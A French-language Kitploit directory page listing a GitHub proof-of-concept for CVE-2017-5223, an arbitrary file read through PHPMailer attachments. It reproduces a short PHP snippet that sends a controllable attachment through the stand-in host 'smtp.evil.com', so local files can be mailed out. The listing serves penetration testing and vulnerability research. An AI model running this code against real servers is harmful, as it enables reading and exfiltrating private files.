Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-5223 — Exploit de preuve de concept pour CVE-2017-5223 démontrant une lecture arbitraire de fichier via l'attachement de PHPMailer et l'injection de contenu email. | Kitploit
Outils/GitHubGitHub/cscli/cve-2017-5223
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité des Emails
GitHubcscli/cve-2017-5223

CVE-2017-5223

Exploit de preuve de concept pour CVE-2017-5223 démontrant une lecture arbitraire de fichier via l'attachement de PHPMailer et l'injection de contenu email.

Voir le dépôt
1il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-5223

IsSMTP(); $mail->Host = "smtp.evil.com"; $mail->Port = 25; $mail->SMTPAuth = true; $mail->CharSet = "UTF-8"; $mail->Encoding = "base64"; $mail->Username = "[email protected]"; $mail->Password = "tes1234t"; $mail->Subject = "hello"; $mail->From = "[email protected]"; $mail->FromName = "test"; $address = "[email protected]"; $mail->AddAddress($address, "test"); $mail->AddAttachment('test.txt','test.txt'); // test.txt contrôlable permet la lecture de fichiers arbitraires $mail->IsHTML(true); $msg="test";// Le contenu de l'email est écrit comme ceci. $mail->msgHTML($msg); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!"; } ?>
Télécharger l’outil